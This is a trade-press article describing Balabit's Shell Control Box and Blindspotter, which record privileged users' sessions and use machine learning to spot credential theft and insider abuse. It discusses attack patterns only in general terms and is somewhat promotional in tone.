BUDAPEST—There is a consistent factor that will often be discovered in the aftermath of many of today’s data breaches and network breach attempts. It’s the first phase of the attacks that few notice, because it starts as a phishing email that attempts to get the login credentials for a privileged network user.
In many cases, the attack proceeds deliberately, perhaps hitting an employee who has access to information needed to get credentials with higher privileges. This continues until the hackers behind the phishing attack gain what they’re really after, the credentials for someone with complete access to the network.
These initial attacks may proceed slowly so that the people behind them can make sure that they’re getting the access they want without being detected. In many cases, those hackers work for governments, but they may also work for organized criminals. Patiently, they wait until they have the keys they want, then they quietly strike.
In most networks, even those with excellent perimeter defenses and with well-configured intrusion detection systems, the first stages are missed because they operate at such a low level.
When they finally get the access they need, the hackers are careful so they don’t arouse suspicion. Eventually they are able to insert the malware or other means of getting the data that they want, at which point they can sit back and let it flow to them.
But if something interrupts the patient attempts to gain access, then the whole attack plan may be terminated because once the security staff knows what’s up, they’ll stop it. This is the role that European network security newcomer Balabit performs with a pair of products that work together to gather even the most subtle data and then analyze it for unexpected behavior.
The idea behind Balabit’s Blindspotter and Shell Control Box is that if you gather enough data and subject it to analysis comparing activity that’s expected with actual activity on an active network, it’s possible to tell if someone is using a person’s credentials who shouldn’t be or whether a privileged user is abusing their access rights.
The Balabit Shell Control Box is an appliance that monitors all network activity and records the activity of users, including all privileged users, right down to every keystroke and mouse movement. Because privileged users such as network administrators are a key target for breaches it can pay special attention to them.
The Blindspotter software sifts through the data collected by the Shell Control Box and looks for anything out of the ordinary. In addition to spotting things like a user coming into the network from a strange IP address or at an unusual time of day—something that other security software can do—Blindspotter is able to analyze what’s happening with each user, but is able to spot what is not happening, in other words deviations from normal behavior.
For example, when a user who has been carrying out a specific set of tasks over time suddenly starts doing something else there’s cause for an alert.
Blindspotter Uses Machine Learning to Find Suspicious Network Activity
Likewise, if a user that’s been doing administrative tasks starts sending large files to an outside IP address, that’s another alert.
But with the machine learning in Blindspotter even seemingly minor things can raise the alarm. Suppose, for example, an administrator performs a series of tasks in the same order ever day which might be normal. But suppose those tasks are carried out exactly the same way at exactly the same time every day, which is something a person wouldn’t do because people normally aren’t that exact. Then again it’s a reason to raise an alarm.
But it can go even deeper. It turns out that a person’s mouse and keyboard use have certain patterns and rhythms, which can be detected and analyzed by Blindspotter and stored by Shell Control Box. If someone suddenly exhibits a different manner of mouse or keyboard use, then it’s time to issue an alert to the security staff who may want to check the user out.
Sometimes, of course, the problem isn’t an unauthorized user, but rather a trusted user doing things they shouldn’t. Then, the keystrokes, mouse movements and data flow that caused suspicion can be played back, just as if they were recorded on tape, so that the security staff can see what a user who triggered an alert was actually up to. This is the way that you might detect a sales person downloading the company customer list before going to work for a competitor.
What’s important is that with the machine learning in Blindspotter, it’s now possible to detect the activities of fraudulent users after privileged accounts have been hijacked, or when privileged users take advantage of their position. This has been difficult to impossible to accomplish with earlier security products, leaving companies open to attacks through the conduits they need to operate.
And there’s another capability that can help companies trying to stay free from breaches. Because the Shell Control Box works as a proxy and router, it can prevent the movement of data outside the network, effectively acting as a default-deny router.
For most organizations, the ability to get an alert when something unexpected is going on, especially with privileged users, is a powerful security tool. Couple that with the ability to play back suspicious access sessions and it’s now possible to see when a privileged user is doing something wrong or when the user’s account has been taken over by an intruder.
By filtering out extraneous information, the end result is that network managers can have the ability to spot the beginnings of a breach in its earliest stages and stop it in its tracks.
This alone could have prevented some of the most serious recent attacks ranging from data breaches at the Target retail chain to the U.S. Office of Personnel Management. It’s a capability that should exist in one way in enterprises that may be attacked, which we can safely assume is all of them.